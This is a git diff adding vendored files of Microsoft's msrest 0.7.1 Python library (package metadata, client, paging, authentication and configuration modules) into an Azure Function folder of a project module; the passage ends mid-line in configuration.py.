+msrest-0.7.1.dist-info/METADATA,sha256=yv3XS6yNXCzIkyZ3QLA2QTluybTBrlPqIGKY8OvfjoM,21655 +msrest-0.7.1.dist-info/RECORD,, +msrest-0.7.1.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +msrest-0.7.1.dist-info/top_level.txt,sha256=fTM0WfmxiY5eFZgIwGfhfCMBAq84y9Uw6zfp_Ctbr0s,7 +msrest/__init__.py,sha256=TLrJwx1IGd_NWQnxiPlXoXQUdDUSwjCxgDp9ZxA3h7E,1634 +msrest/__pycache__/__init__.cpython-39.pyc,, +msrest/__pycache__/async_client.cpython-39.pyc,, +msrest/__pycache__/async_paging.cpython-39.pyc,, +msrest/__pycache__/authentication.cpython-39.pyc,, +msrest/__pycache__/configuration.cpython-39.pyc,, +msrest/__pycache__/exceptions.cpython-39.pyc,, +msrest/__pycache__/http_logger.cpython-39.pyc,, +msrest/__pycache__/paging.cpython-39.pyc,, +msrest/__pycache__/serialization.cpython-39.pyc,, +msrest/__pycache__/service_client.cpython-39.pyc,, +msrest/__pycache__/version.cpython-39.pyc,, +msrest/async_client.py,sha256=o8P3U_0HNMLL3ED9_9lEhXzhkCBojbilCu37SxejDfE,4901 +msrest/async_paging.py,sha256=S3xxEudk5tEWq_KbQlzbe7F4AGHD3M2ssHJLtjx3e3U,3352 +msrest/authentication.py,sha256=GSfBrDq3WfZ3G1LqyCrwaRcj9A7kLe34ATwsSmNAZRI,10897 +msrest/configuration.py,sha256=kSkV-4G_t2nuYoaknvQNQtT6fy7UoeT0uOyQJ9sfgqI,3648 +msrest/exceptions.py,sha256=sxCSeKBwv41HP-pXaq5tF6GhJWUgFceSGsNdGysUxaA,7898 +msrest/http_logger.py,sha256=qffLjR2ClkE_jpnZa3btgcVKtf9K-0EmdRn1S3KKJAs,4316 +msrest/paging.py,sha256=_bYJFIn5lWS4L9CTr75DKIRQ5Xol9JizJyquDTn2klQ,5564 +msrest/pipeline/__init__.py,sha256=hkddy5lKohtqjG7DqIaf9JAl4xVwa7-nlBxGiIkkUfQ,12226 +msrest/pipeline/__pycache__/__init__.cpython-39.pyc,, +msrest/pipeline/__pycache__/aiohttp.cpython-39.pyc,, +msrest/pipeline/__pycache__/async_abc.cpython-39.pyc,, +msrest/pipeline/__pycache__/async_requests.cpython-39.pyc,, +msrest/pipeline/__pycache__/requests.cpython-39.pyc,, +msrest/pipeline/__pycache__/universal.cpython-39.pyc,, +msrest/pipeline/aiohttp.py,sha256=A91bO3IaVZ8dgD10cV7m29z5Kzr6VYuKMGpzqxAyvf8,2515 
+msrest/pipeline/async_abc.py,sha256=LHo6ntia5yU5MkRTparAlZSnbh9psZh5OIfxzvFVIZc,6497 +msrest/pipeline/async_requests.py,sha256=CH0K8ggLzuhQk3-c-ZeQ0NY0OXyqYWUsOMLpFNkQoc4,5264 +msrest/pipeline/requests.py,sha256=VWDM-roTBfsrkDWCO_QUdgpGdHH3YRy8XPohDgWWy5s,7718 +msrest/pipeline/universal.py,sha256=3t8yOlaVCZYvIosTBzqJ-fyleSm3UYq2PxHgzuJ9gq4,9953 +msrest/polling/__init__.py,sha256=9FBuXsSqpLFmyYTwXFGW6aIDIsSnXzUFOJBvjpDdXzo,1661 +msrest/polling/__pycache__/__init__.cpython-39.pyc,, +msrest/polling/__pycache__/async_poller.cpython-39.pyc,, +msrest/polling/__pycache__/poller.cpython-39.pyc,, +msrest/polling/async_poller.py,sha256=tlnsKwjxLfmO-_N9eS53uecMZvqDCQ0qEjC8BzA9ldw,3873 +msrest/polling/poller.py,sha256=tUm8sVwrocK6qBdrlncVmgwW-SMtFiFEd0Km-Y6oir8,9051 +msrest/py.typed,sha256=dcrsqJrcYfTX-ckLFJMTaj6mD8aDe2u0tkQG-ZYxnEg,26 +msrest/serialization.py,sha256=4wmabsFPGKP28yjbPisv0SQpN77wShNbGzz0ykgIyV0,78879 +msrest/service_client.py,sha256=_nu9UXTYsMczQIdkxBllSSeX9ZMLWR_xWG9OwwFZqV8,15822 +msrest/universal_http/__init__.py,sha256=EmhLLs_qvzwyfVAbNDsPqqe0ddHwREOmw8BpzpV7ttU,16051 +msrest/universal_http/__pycache__/__init__.cpython-39.pyc,, +msrest/universal_http/__pycache__/aiohttp.cpython-39.pyc,, +msrest/universal_http/__pycache__/async_abc.cpython-39.pyc,, +msrest/universal_http/__pycache__/async_requests.cpython-39.pyc,, +msrest/universal_http/__pycache__/requests.cpython-39.pyc,, +msrest/universal_http/aiohttp.py,sha256=WxtJrbx2wQKT5hdtM50BdnfMFvaW0IdWPf9zJhJhzsc,4089 +msrest/universal_http/async_abc.py,sha256=HibWWJWCTPznuFokD4xS3It9PLwBf45Ud88DBTSQZ1A,3249 +msrest/universal_http/async_requests.py,sha256=J7lJvW-WFnC6YeZOyMhM72wXGWMwg24iVgZMi-r9_N0,9175 +msrest/universal_http/requests.py,sha256=EYkSMB-wMhHAhqTuXTZmNrWyb8Bf8c4-jVnVFAzJFIw,16950 +msrest/version.py,sha256=QHs16xc_Qn9HjgW5e8lvq_16_ol3QOYqyyQ9YhlcmEI,1391 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/WHEEL new file mode 100644 index 0000000..153494e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/top_level.txt new file mode 100644 index 0000000..722e8cf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/top_level.txt @@ -0,0 +1 @@ +msrest diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__init__.py new file mode 100644 index 0000000..03a259d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__init__.py @@ -0,0 +1,40 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +from .version import msrest_version +from .configuration import Configuration +from .service_client import ServiceClient, SDKClient +from .serialization import Serializer, Deserializer + +__all__ = [ + "ServiceClient", + "SDKClient", + "Serializer", + "Deserializer", + "Configuration" + ] + +__version__ = msrest_version diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..edcc629 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_client.cpython-39.pyc new file mode 100644 index 0000000..ab3aa9b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_paging.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_paging.cpython-39.pyc new file mode 100644 index 0000000..fb84b71 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/async_paging.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/authentication.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/authentication.cpython-39.pyc new file mode 100644 index 0000000..eb85825 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/authentication.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/configuration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/configuration.cpython-39.pyc new file mode 100644 index 0000000..bfe984f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/configuration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..e0145f3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/http_logger.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/http_logger.cpython-39.pyc new file mode 100644 index 0000000..91b8bda Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/http_logger.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/paging.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/paging.cpython-39.pyc new file mode 100644 index 0000000..ea609a0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/paging.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/serialization.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/serialization.cpython-39.pyc new file mode 100644 index 0000000..2c5a493 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/serialization.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/service_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/service_client.cpython-39.pyc new file mode 100644 index 0000000..d88b5fc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/service_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/version.cpython-39.pyc new file mode 100644 index 0000000..9043978 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/__pycache__/version.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_client.py 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_client.py new file mode 100644 index 0000000..257bbb2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_client.py @@ -0,0 +1,127 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import functools +import logging + +from typing import Any, Dict, List, Union, TYPE_CHECKING + +from .universal_http import ClientRequest +from .universal_http.async_requests import AsyncRequestsHTTPSender +from .pipeline import Request, AsyncPipeline, AsyncHTTPPolicy, SansIOHTTPPolicy +from .pipeline.async_requests import ( + AsyncPipelineRequestsHTTPSender, + AsyncRequestsCredentialsPolicy +) +from .pipeline.universal import ( + HTTPLogger, + RawDeserializer, +) + +from .service_client import _ServiceClientCore + +if TYPE_CHECKING: + from .configuration import Configuration # pylint: disable=unused-import + +_LOGGER = logging.getLogger(__name__) + + +class SDKClientAsync: + """The base class of all generated SDK async client. + """ + + def __init__(self, config: 'Configuration') -> None: + self._client = ServiceClientAsync(config) + + async def __aenter__(self): + await self._client.__aenter__() + return self + + async def __aexit__(self, *exc_details): + await self._client.__aexit__(*exc_details) + + +class ServiceClientAsync(_ServiceClientCore): + + def __init__(self, config: 'Configuration') -> None: + super(ServiceClientAsync, self).__init__(config) + + self.config.pipeline = self._create_default_pipeline() # type: ignore + + def _create_default_pipeline(self): + creds = self.config.credentials + + policies = [ + self.config.user_agent_policy, # UserAgent policy + RawDeserializer(), # Deserialize the raw bytes + self.config.http_logger_policy # HTTP request/response log + ] # type: List[Union[AsyncHTTPPolicy, SansIOHTTPPolicy]] + if creds: + if isinstance(creds, (AsyncHTTPPolicy, SansIOHTTPPolicy)): + policies.insert(1, creds) + else: + # Assume this is the old credentials class, and then requests. Wrap it. 
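# Note on the step above: with the default policies list, the finished async
# pipeline runs UserAgentPolicy -> credentials policy (when one was inserted at
# index 1) -> RawDeserializer -> HTTPLogger, and then hands the request to the
# requests-based async sender constructed just below.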
+ policies.insert(1, AsyncRequestsCredentialsPolicy(creds)) + + return AsyncPipeline( + policies, + AsyncPipelineRequestsHTTPSender( + AsyncRequestsHTTPSender(self.config) # Send HTTP request using requests + ) + ) + + async def __aenter__(self): + await self.config.pipeline.__aenter__() + return self + + async def __aexit__(self, *exc_details): + await self.config.pipeline.__aexit__(*exc_details) + + async def async_send(self, request, **kwargs): + """Prepare and send request object according to configuration. + + :param ClientRequest request: The request object to be sent. + :param dict headers: Any headers to add to the request. + :param content: Any body data to add to the request. + :param config: Any specific config overrides + """ + kwargs.setdefault('stream', True) + # In the current backward compatible implementation, return the HTTP response + # and plug context inside. Could be remove if we modify Autorest, + # but we still need it to be backward compatible + pipeline_response = await self.config.pipeline.run(request, **kwargs) + response = pipeline_response.http_response + response.context = pipeline_response.context + return response + + def stream_download_async(self, response, user_callback): + """Async Generator for streaming request body data. + + :param response: The initial response + :param user_callback: Custom callback for monitoring progress. + """ + block = self.config.connection.data_block_size + return response.stream_download(block, user_callback) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_paging.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_paging.py new file mode 100644 index 0000000..3b124ae --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/async_paging.py @@ -0,0 +1,79 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from collections.abc import AsyncIterator +import logging + +_LOGGER = logging.getLogger(__name__) + +class AsyncPagedMixin(AsyncIterator): + + def __init__(self, *args, **kwargs): + """Bring async to Paging. + + "async_command" is mandatory keyword argument for this mixin to work. 
+ """ + self._async_get_next = kwargs.get("async_command") + if not self._async_get_next: + _LOGGER.debug("Paging async iterator protocol is not available for %s", + self.__class__.__name__) + + async def async_get(self, url): + """Get an arbitrary page. + + This resets the iterator and then fully consumes it to return the + specific page **only**. + + :param str url: URL to arbitrary page results. + """ + self.reset() + self.next_link = url + return await self.async_advance_page() + + async def async_advance_page(self): + if not self._async_get_next: + raise NotImplementedError( + "The class %s does not support async paging at the moment.", + self.__class__.__name__ + ) + if self.next_link is None: + raise StopAsyncIteration("End of paging") + self._current_page_iter_index = 0 + self._response = await self._async_get_next(self.next_link) + self._derserializer(self, self._response) + return self.current_page + + async def __anext__(self): + """Iterate through responses.""" + # Storing the list iterator might work out better, but there's no + # guarantee that some code won't replace the list entirely with a copy, + # invalidating an list iterator that might be saved between iterations. + if self.current_page and self._current_page_iter_index < len(self.current_page): + response = self.current_page[self._current_page_iter_index] + self._current_page_iter_index += 1 + return response + else: + await self.async_advance_page() + return await self.__anext__() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/authentication.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/authentication.py new file mode 100644 index 0000000..4218ada --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/authentication.py @@ -0,0 +1,306 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from typing import Optional, Dict + +import requests +from requests.auth import HTTPBasicAuth +import requests_oauthlib as oauth + + +class Authentication(object): + """Default, simple auth object. + Doesn't actually add any auth headers. 
+ """ + + header = "Authorization" + + def signed_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Create requests session with any required auth headers applied. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + return session or requests.Session() + + +class BasicAuthentication(Authentication): + """Implementation of Basic Authentication. + + :param str username: Authentication username. + :param str password: Authentication password. + """ + + def __init__(self, username, password): + # type: (str, str) -> None + self.scheme = 'Basic' + self.username = username + self.password = password + + def signed_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Create requests session with any required auth headers + applied. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + session = super(BasicAuthentication, self).signed_session(session) + session.auth = HTTPBasicAuth(self.username, self.password) + return session + + +class BasicTokenAuthentication(Authentication): + """Simple Token Authentication. + Does not adhere to OAuth, simply adds provided token as a header. + + :param dict[str,str] token: Authentication token, must have 'access_token' key. + """ + + def __init__(self, token): + # type: (Dict[str, str]) -> None + self.scheme = 'Bearer' + self.token = token + + def set_token(self): + # type: () -> None + """Should be used to define the self.token attribute. + + In this implementation, does nothing since the token is statically provided + at creation. + """ + pass + + def signed_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Create requests session with any required auth headers + applied. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + session = super(BasicTokenAuthentication, self).signed_session(session) + header = "{} {}".format(self.scheme, self.token['access_token']) + session.headers['Authorization'] = header + return session + + +class OAuthTokenAuthentication(BasicTokenAuthentication): + """OAuth Token Authentication. + + Requires that supplied token contains an expires_in field. + + :param str client_id: Account Client ID. + :param dict[str,str] token: OAuth2 token. + """ + + def __init__(self, client_id, token): + # type: (str, Dict[str, str]) -> None + super(OAuthTokenAuthentication, self).__init__(token) + self.id = client_id + self.store_key = self.id + + def construct_auth(self): + # type: () -> str + """Format token header. + + :rtype: str + """ + return "{} {}".format(self.scheme, self.token) + + def refresh_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Return updated session if token has expired, attempts to + refresh using refresh token. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. 
+ + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + return self.signed_session(session) + + def signed_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Create requests session with any required auth headers applied. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + session = session or requests.Session() # Don't call super on purpose, let's "auth" manage the headers. + session.auth = oauth.OAuth2(self.id, token=self.token) + return session + + +class KerberosAuthentication(Authentication): + """Kerberos Authentication + Kerberos Single Sign On (SSO); requires requests_kerberos is installed. + + :param mutual_authentication: whether to require mutual authentication. Use values from requests_kerberos import REQUIRED, OPTIONAL, or DISABLED + """ + def __init__(self, mutual_authentication=None): + super(KerberosAuthentication, self).__init__() + self.mutual_authentication = mutual_authentication + + def signed_session(self, session=None): + """Create requests session with Negotiate (SPNEGO) headers applied. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. + + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + session = super(KerberosAuthentication, self).signed_session(session) + try: + from requests_kerberos import HTTPKerberosAuth + except ImportError: + raise ImportError("In order to use KerberosAuthentication please do 'pip install requests_kerberos' first") + if self.mutual_authentication: + session.auth = HTTPKerberosAuth(mutual_authentication=self.mutual_authentication) + else: + session.auth = HTTPKerberosAuth() + return session + + +class ApiKeyCredentials(Authentication): + """Represent the ApiKey feature of Swagger. + + Dict should be dict[str,str] to be accepted by requests. + + :param dict[str,str] in_headers: Headers part of the ApiKey + :param dict[str,str] in_query: ApiKey in the query as parameters + """ + def __init__(self, in_headers=None, in_query=None): + # type: (Optional[Dict[str, str]], Optional[Dict[str, str]]) -> None + super(ApiKeyCredentials, self).__init__() + if in_headers is None: + in_headers = {} + if in_query is None: + in_query = {} + + if not in_headers and not in_query: + raise ValueError("You need to define in_headers or in_query") + + self.in_headers = in_headers + self.in_query = in_query + + def signed_session(self, session=None): + # type: (Optional[requests.Session]) -> requests.Session + """Create requests session with ApiKey. + + If a session object is provided, configure it directly. Otherwise, + create a new session and return it. 
+ + :param session: The session to configure for authentication + :type session: requests.Session + :rtype: requests.Session + """ + session = super(ApiKeyCredentials, self).signed_session(session) + session.headers.update(self.in_headers) + try: + # params is actually Union[bytes, MutableMapping[Text, Text]] + session.params.update(self.in_query) # type: ignore + except AttributeError: # requests.params can be bytes + raise ValueError("session.params must be a dict to be used in ApiKeyCredentials") + return session + + +class CognitiveServicesCredentials(ApiKeyCredentials): + """Cognitive Services authentication. + + :param str subscription_key: The CS subscription key + """ + + _subscription_key_header = 'Ocp-Apim-Subscription-Key' + + def __init__(self, subscription_key): + # type: (str) -> None + if not subscription_key: + raise ValueError("Subscription key cannot be None") + super(CognitiveServicesCredentials, self).__init__( + in_headers={ + self._subscription_key_header: subscription_key, + 'X-BingApis-SDK-Client': 'Python-SDK' + } + ) + + +class TopicCredentials(ApiKeyCredentials): + """Event Grid authentication. + + :param str topic_key: The Event Grid topic key + """ + + _topic_key_header = 'aeg-sas-key' + + def __init__(self, topic_key): + # type: (str) -> None + if not topic_key: + raise ValueError("Topic key cannot be None") + super(TopicCredentials, self).__init__( + in_headers={ + self._topic_key_header: topic_key, + } + ) + + +class DomainCredentials(ApiKeyCredentials): + """Event Grid domain authentication. + + :param str domain_key: The Event Grid domain key + """ + + _domain_key_header = 'aeg-sas-key' + + def __init__(self, domain_key): + # type: (str) -> None + if not domain_key: + raise ValueError("Domain key cannot be None") + super(DomainCredentials, self).__init__( + in_headers={ + self._domain_key_header: domain_key, + } + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/configuration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/configuration.py new file mode 100644 index 0000000..594679e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/configuration.py @@ -0,0 +1,103 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
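# A runnable sketch of the ApiKey-style credentials defined above; the key value
# is a made-up placeholder, not a real subscription key.
from msrest.authentication import CognitiveServicesCredentials

creds = CognitiveServicesCredentials("00000000000000000000000000000000")
session = creds.signed_session()
# signed_session() merged the two headers set in __init__ into the session:
assert session.headers["Ocp-Apim-Subscription-Key"] == "00000000000000000000000000000000"
assert session.headers["X-BingApis-SDK-Client"] == "Python-SDK"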
+# +# -------------------------------------------------------------------------- + + +try: + import configparser + from configparser import NoOptionError +except ImportError: + import ConfigParser as configparser # type: ignore + from ConfigParser import NoOptionError # type: ignore + +from typing import TYPE_CHECKING, Optional, Dict, List, Any, Callable, Union # pylint: disable=unused-import + +from .pipeline import Pipeline +from .universal_http.requests import ( + RequestHTTPSenderConfiguration +) +from .pipeline.universal import ( + UserAgentPolicy, + HTTPLogger, +) + +if TYPE_CHECKING: + from .pipeline import AsyncPipeline + +class Configuration(RequestHTTPSenderConfiguration): + """Client configuration. + + :param str baseurl: REST API base URL. + :param str filepath: Path to existing config file (optional). + """ + + def __init__(self, base_url, filepath=None): + # type: (str, Optional[str]) -> None + + super(Configuration, self).__init__(filepath) + # Service + self.base_url = base_url + + # User-Agent as a policy + self.user_agent_policy = UserAgentPolicy() + + # HTTP logger policy + self.http_logger_policy = HTTPLogger() + + # The pipeline. We don't know until a ServiceClient use this configuration if it will be sync or async + # We instantiate with a default empty Pipeline for mypy mostly, trying to use a pipeline from a pure + # configuration object doesn't make sense. + self.pipeline = Pipeline() # type: Union[Pipeline, 